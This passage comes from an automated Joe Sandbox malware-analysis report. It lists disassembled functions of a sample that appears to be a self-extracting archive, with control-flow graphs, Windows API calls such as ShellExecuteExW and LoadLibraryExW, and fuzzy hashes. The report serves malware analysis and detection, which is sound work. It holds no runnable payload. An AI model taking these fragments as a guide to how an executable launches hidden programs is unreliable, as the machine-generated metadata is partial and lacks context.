894 a4d998-a4d9a6 892->894 895 a4d989-a4d996 call a41fbb 892->895 894->871 899 a4d9a8-a4d9aa 894->899 895->869 895->894 899->871 901 a4d9ac-a4d9b2 899->901 900->890 901->871 904 a4d9b4-a4d9be 901->904 904->871 905->892 906 a4d950-a4d961 GetExitCodeProcess 905->906 906->892 907 a4d963-a4d96d 906->907 908 a4d974 907->908 909 a4d96f 907->909 908->892 909->908
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 00A4D7AE
                                                                                            • ShellExecuteExW.SHELL32(?), ref: 00A4D8DE
                                                                                            • ShowWindow.USER32(?,00000000), ref: 00A4D91D
                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00A4D959
                                                                                            • CloseHandle.KERNEL32(?), ref: 00A4D97F
                                                                                            • ShowWindow.USER32(?,00000001), ref: 00A4D9E1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                            • String ID: .exe$.inf
                                                                                            • API String ID: 36480843-3750412487
                                                                                            • Opcode ID: 641f11c0673518e1a951dc7fbe442e0bba709c9669fee8ec6b2eefdfbdad5880
                                                                                            • Instruction ID: 01360a48174a28e258b0e4a845af3e5e617e19612d737d122623d57b11cb3fff
                                                                                            • Opcode Fuzzy Hash: 641f11c0673518e1a951dc7fbe442e0bba709c9669fee8ec6b2eefdfbdad5880
                                                                                            • Instruction Fuzzy Hash: 1551D379504380AADB31DF649844BBBBBF5AFC1744F04081EF9C5D71A2E7718A85CB62
                                                                                            Function 00A5A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 910 a5a95b-a5a974 911 a5a976-a5a986 call a5ef4c 910->911 912 a5a98a-a5a98f 910->912 911->912 922 a5a988 911->922 913 a5a991-a5a999 912->913 914 a5a99c-a5a9c0 MultiByteToWideChar 912->914 913->914 916 a5a9c6-a5a9d2 914->916 917 a5ab53-a5ab66 call a4fbbc 914->917 919 a5a9d4-a5a9e5 916->919 920 a5aa26 916->920 923 a5aa04-a5aa15 call a58e06 919->923 924 a5a9e7-a5a9f6 call a62010 919->924 926 a5aa28-a5aa2a 920->926 922->912 930 a5ab48 923->930 938 a5aa1b 923->938 924->930 937 a5a9fc-a5aa02 924->937 929 a5aa30-a5aa43 MultiByteToWideChar 926->929 926->930 929->930 931 a5aa49-a5aa5b call a5af6c 929->931 932 a5ab4a-a5ab51 call a5abc3 930->932 939 a5aa60-a5aa64 931->939 932->917 941 a5aa21-a5aa24 937->941 938->941 939->930 942 a5aa6a-a5aa71 939->942 941->926 943 a5aa73-a5aa78 942->943 944 a5aaab-a5aab7 942->944 943->932 945 a5aa7e-a5aa80 943->945 946 a5ab03 944->946 947 a5aab9-a5aaca 944->947 945->930 948 a5aa86-a5aaa0 call a5af6c 945->948 949 a5ab05-a5ab07 946->949 950 a5aae5-a5aaf6 call a58e06 947->950 951 a5aacc-a5aadb call a62010 947->951 948->932 963 a5aaa6 948->963 954 a5ab41-a5ab47 call a5abc3 949->954 955 a5ab09-a5ab22 call a5af6c 949->955 950->954 962 a5aaf8 950->962 951->954 966 a5aadd-a5aae3 951->966 954->930 955->954 968 a5ab24-a5ab2b 955->968 967 a5aafe-a5ab01 962->967 963->930 966->967 967->949 969 a5ab67-a5ab6d 968->969 970 a5ab2d-a5ab2e 968->970 971 a5ab2f-a5ab3f WideCharToMultiByte 969->971 970->971 971->954 972 a5ab6f-a5ab76 call a5abc3 971->972 972->932
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A55695,00A55695,?,?,?,00A5ABAC,00000001,00000001,2DE85006), ref: 00A5A9B5
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A5ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00A5AA3B
                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A5AB35
                                                                                            • __freea.LIBCMT ref: 00A5AB42
                                                                                              • Part of subcall function 00A58E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A5CA2C,00000000,?,00A56CBE,?,00000008,?,00A591E0,?,?,?), ref: 00A58E38
                                                                                            • __freea.LIBCMT ref: 00A5AB4B
                                                                                            • __freea.LIBCMT ref: 00A5AB70
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1414292761-0
                                                                                            • Opcode ID: f29a06992dbada16d3e5cfc68dd98b4314f52294d0c2526b9da2417cdd761345
                                                                                            • Instruction ID: 07466a1a4b0e35811d6fb1f219028238b8ab1e9ad1461a75c502aab599cc9330
                                                                                            • Opcode Fuzzy Hash: f29a06992dbada16d3e5cfc68dd98b4314f52294d0c2526b9da2417cdd761345
                                                                                            • Instruction Fuzzy Hash: 1451D072B00216AFDB258F64CD41EABBBABFB64751F164728FD04D6140EB34DC58C692
                                                                                            Function 00A53B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 975 a53b72-a53b7c 976 a53bee-a53bf1 975->976 977 a53bf3 976->977 978 a53b7e-a53b8c 976->978 979 a53bf5-a53bf9 977->979 980 a53b95-a53bb1 LoadLibraryExW 978->980 981 a53b8e-a53b91 978->981 984 a53bb3-a53bbc GetLastError 980->984 985 a53bfa-a53c00 980->985 982 a53b93 981->982 983 a53c09-a53c0b 981->983 987 a53beb 982->987 983->979 988 a53be6-a53be9 984->988 989 a53bbe-a53bd3 call a56088 984->989 985->983 986 a53c02-a53c03 FreeLibrary 985->986 986->983 987->976 988->987 989->988 992 a53bd5-a53be4 LoadLibraryExW 989->992 992->985 992->988
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00A53C35,?,?,00A92088,00000000,?,00A53D60,00000004,InitializeCriticalSectionEx,00A66394,InitializeCriticalSectionEx,00000000), ref: 00A53C03
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID: api-ms-
                                                                                            • API String ID: 3664257935-2084034818
                                                                                            • Opcode ID: ed270661eacea5bf40d4e6caf2dbd87daf2a1c0b76107bc575ec231e6326b853
                                                                                            • Instruction ID: 13a2c89a1a99ad02a361320ebd19ecbd2d2b816c7345e9f4c6dae38049ad1494
                                                                                            • Opcode Fuzzy Hash: ed270661eacea5bf40d4e6caf2dbd87daf2a1c0b76107bc575ec231e6326b853
                                                                                            • Instruction Fuzzy Hash: 3611A333A45221ABCF228BA89C41B5D3774BF417B2F260211ED15FB290E771EF0986D1
                                                                                            Function 00A4AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 00A4081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A40836
                                                                                              • Part of subcall function 00A4081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3F2D8,Crypt32.dll,00000000,00A3F35C,?,?,00A3F33E,?,?,?), ref: 00A40858
                                                                                            • OleInitialize.OLE32(00000000), ref: 00A4AC2F
                                                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A4AC66
                                                                                            • SHGetMalloc.SHELL32(00A78438), ref: 00A4AC70
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                            • String ID: riched20.dll$3Ro
                                                                                            • API String ID: 3498096277-3613677438
                                                                                            • Opcode ID: 26724c0ea3f9802abaadf8aa4c438cdf7b7956a79f8988655ebdccf1a11d11c8
                                                                                            • Instruction ID: 0102b81dd73b08f235962cf463777158fb619301579b16f6d2a490cb69b4beab
                                                                                            • Opcode Fuzzy Hash: 26724c0ea3f9802abaadf8aa4c438cdf7b7956a79f8988655ebdccf1a11d11c8
                                                                                            • Instruction Fuzzy Hash: C3F0F9B5D00209ABCB10EFA9D9499AFFBFCEF94700F00415AE415A2251DBB456068BA1
                                                                                            Function 00A398E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 997 a398e0-a39901 call a4ec50 1000 a39903-a39906 997->1000 1001 a3990c 997->1001 1000->1001 1002 a39908-a3990a 1000->1002 1003 a3990e-a3991f 1001->1003 1002->1003 1004 a39921 1003->1004 1005 a39927-a39931 1003->1005 1004->1005 1006 a39933 1005->1006 1007 a39936-a39943 call a36edb 1005->1007 1006->1007 1010 a39945 1007->1010 1011 a3994b-a3996a CreateFileW 1007->1011 1010->1011 1012 a399bb-a399bf 1011->1012 1013 a3996c-a3998e GetLastError call a3bb03 1011->1013 1015 a399c3-a399c6 1012->1015 1018 a399c8-a399cd 1013->1018 1021 a39990-a399b3 CreateFileW GetLastError 1013->1021 1017 a399d9-a399de 1015->1017 1015->1018 1019 a399e0-a399e3 1017->1019 1020 a399ff-a39a10 1017->1020 1018->1017 1022 a399cf 1018->1022 1019->1020 1023 a399e5-a399f9 SetFileTime 1019->1023 1024 a39a12-a39a2a call a40602 1020->1024 1025 a39a2e-a39a39 1020->1025 1021->1015 1026 a399b5-a399b9 1021->1026 1022->1017 1023->1020 1024->1025 1026->1015
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00A37760,?,00000005,?,00000011), ref: 00A3995F
                                                                                            • GetLastError.KERNEL32(?,?,00A37760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A3996C
                                                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00A37760,?,00000005,?), ref: 00A399A2
                                                                                            • GetLastError.KERNEL32(?,?,00A37760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A399AA
                                                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00A37760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A399F9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CreateErrorLast$Time
                                                                                            • String ID:
                                                                                            • API String ID: 1999340476-0
                                                                                            • Opcode ID: bc843632492c8f3a372cfd0fc61bc78f7a05a34b0194aaf8af74783a4342e0c4
                                                                                            • Instruction ID: efde60fd508078525e9f83e450c6d361f917ce0d806548573851a803d46d2cf6
                                                                                            • Opcode Fuzzy Hash: bc843632492c8f3a372cfd0fc61bc78f7a05a34b0194aaf8af74783a4342e0c4
                                                                                            • Instruction Fuzzy Hash: 183122315443456FE730DF64CD86BDBBBA8BB44320F200B19F9A1962E0D7F4A949CB91
                                                                                            Function 00A4B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1056 a4b568-a4b581 PeekMessageW 1057 a4b583-a4b597 GetMessageW 1056->1057 1058 a4b5bc-a4b5be 1056->1058 1059 a4b5a8-a4b5b6 TranslateMessage DispatchMessageW 1057->1059 1060 a4b599-a4b5a6 IsDialogMessageW 1057->1060 1059->1058 1060->1058 1060->1059
                                                                                            APIs
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A4B579
                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4B58A
                                                                                            • IsDialogMessageW.USER32(00010426,?), ref: 00A4B59E
                                                                                            • TranslateMessage.USER32(?), ref: 00A4B5AC
                                                                                            • DispatchMessageW.USER32(?), ref: 00A4B5B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                                                            • String ID:
                                                                                            • API String ID: 1266772231-0
                                                                                            • Opcode ID: 38f175cc7b719cffdb6ebde4d083de0859c86ffa4e5a4b98070f5e8c2811afed
                                                                                            • Instruction ID: 89987c01f8b07e7f1bec8eade7e6713feb7deb93c7f2734f4f67863230272438
                                                                                            • Opcode Fuzzy Hash: 38f175cc7b719cffdb6ebde4d083de0859c86ffa4e5a4b98070f5e8c2811afed
                                                                                            • Instruction Fuzzy Hash: DCF0BD76A0121AAB8F20DBE69C4DDDBBFBCEE452917004415B51AD2010EF74D606CBB1
                                                                                            Function 00A4ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1061 a4abab-a4abca GetClassNameW 1062 a4abf2-a4abf4 1061->1062 1063 a4abcc-a4abe1 call a41fbb 1061->1063 1065 a4abf6-a4abf9 SHAutoComplete 1062->1065 1066 a4abff-a4ac01 1062->1066 1068 a4abf1 1063->1068 1069 a4abe3-a4abef FindWindowExW 1063->1069 1065->1066 1068->1062 1069->1068
                                                                                            APIs
                                                                                            • GetClassNameW.USER32(?,?,00000050), ref: 00A4ABC2
                                                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 00A4ABF9
                                                                                              • Part of subcall function 00A41FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00A3C116,00000000,.exe,?,?,00000800,?,?,?,00A48E3C), ref: 00A41FD1
                                                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00A4ABE9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                            • String ID: EDIT
                                                                                            • API String ID: 4243998846-3080729518
                                                                                            • Opcode ID: 90118d8a9ac342920da3e208a991dd38a74271ae94af1ea7bb2882b2986b14bd
                                                                                            • Instruction ID: 4f0acaf3bcfd5f6492e133c1bd71dba4fd85f5b34bb46f7df20b1932de1981ee
                                                                                            • Opcode Fuzzy Hash: 90118d8a9ac342920da3e208a991dd38a74271ae94af1ea7bb2882b2986b14bd
                                                                                            • Instruction Fuzzy Hash: F8F0823674122876DB309764AC0AF9B767C9F86B40F484012BA05E61C0DB60DE4785B6
                                                                                            Function 00A4DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1070 a4dbde-a4dc09 call a4ec50 SetEnvironmentVariableW call a40371 1074 a4dc0e-a4dc12 1070->1074 1075 a4dc14-a4dc18 1074->1075 1076 a4dc36-a4dc38 1074->1076 1077 a4dc21-a4dc28 call a4048d 1075->1077 1080 a4dc1a-a4dc20 1077->1080 1081 a4dc2a-a4dc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1076
                                                                                            APIs
                                                                                            • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00A4DBF4
                                                                                            • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A4DC30
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnvironmentVariable
                                                                                            • String ID: sfxcmd$sfxpar
                                                                                            • API String ID: 1431749950-3493335439
                                                                                            • Opcode ID: 5746b82984350b7f00db143841392929000ae6ad2913f1e9d897f5443564e7ba
                                                                                            • Instruction ID: a9e7f6840c309cb356ef3fe243d278dee9bf501937a8f0fc2ab8c5fc9cfe8bd1
                                                                                            • Opcode Fuzzy Hash: 5746b82984350b7f00db143841392929000ae6ad2913f1e9d897f5443564e7ba
                                                                                            • Instruction Fuzzy Hash: 85F0A7B680422476CF206FE58D46FAB3B68BF46781B040515FE8596051D6F08941D6A0
                                                                                            Function 00A39785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1082 a39785-a39791 1083 a39793-a3979b GetStdHandle 1082->1083 1084 a3979e-a397b5 ReadFile 1082->1084 1083->1084 1085 a39811 1084->1085 1086 a397b7-a397c0 call a398bc 1084->1086 1087 a39814-a39817 1085->1087 1090 a397c2-a397ca 1086->1090 1091 a397d9-a397dd 1086->1091 1090->1091 1094 a397cc 1090->1094 1092 a397df-a397e8 GetLastError 1091->1092 1093 a397ee-a397f2 1091->1093 1092->1093 1095 a397ea-a397ec 1092->1095 1096 a397f4-a397fc 1093->1096 1097 a3980c-a3980f 1093->1097 1098 a397cd-a397d7 call a39785 1094->1098 1095->1087 1096->1097 1099 a397fe-a39807 GetLastError 1096->1099 1097->1087 1098->1087 1099->1097 1102 a39809-a3980a 1099->1102 1102->1098
                                                                                            APIs
                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00A39795
                                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00A397AD
                                                                                            • GetLastError.KERNEL32 ref: 00A397DF
                                                                                            • GetLastError.KERNEL32 ref: 00A397FE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FileHandleRead
                                                                                            • String ID:
                                                                                            • API String ID: 2244327787-0
                                                                                            • Opcode ID: 10dd4a9e2e2bcebf2e56fb63ad76fcf4edf40df538eb77560cc9ca2fcd2f7ea6
                                                                                            • Instruction ID: e78275b49fb1405220fd1a93e9e83a9a819d3edfc687090ce9011541dfd2ad9e
                                                                                            • Opcode Fuzzy Hash: 10dd4a9e2e2bcebf2e56fb63ad76fcf4edf40df538eb77560cc9ca2fcd2f7ea6
                                                                                            • Instruction Fuzzy Hash: BA116131914604FBDF209F65C804A6B77B9FB86361F108929F426C52D0D7F4DE45DBA1
                                                                                            Function 00A5AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00A53F73,00000000,00000000,?,00A5ACDB,00A53F73,00000000,00000000,00000000,?,00A5AED8,00000006,FlsSetValue), ref: 00A5AD66
                                                                                            • GetLastError.KERNEL32(?,00A5ACDB,00A53F73,00000000,00000000,00000000,?,00A5AED8,00000006,FlsSetValue,00A67970,FlsSetValue,00000000,00000364,?,00A598B7), ref: 00A5AD72
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A5ACDB,00A53F73,00000000,00000000,00000000,?,00A5AED8,00000006,FlsSetValue,00A67970,FlsSetValue,00000000), ref: 00A5AD80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 3177248105-0
                                                                                            • Opcode ID: b3a1e88f80ac577e47f006456edae25c8a0b1a06de82d5506010aa276ab886f4
                                                                                            • Instruction ID: a6a02c0ace9c72d80d9924c72d928c7817558d222acb5e5c40eed418ff029aac
                                                                                            • Opcode Fuzzy Hash: b3a1e88f80ac577e47f006456edae25c8a0b1a06de82d5506010aa276ab886f4
                                                                                            • Instruction Fuzzy Hash: 10012433311226ABCB219BA8AC44B967BB8BF24BA37110320FC16D3550D730C80A86E1
                                                                                            Function 00A39F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00A3D343,00000001,?,?,?,00000000,00A4551D,?,?,?), ref: 00A39F9E
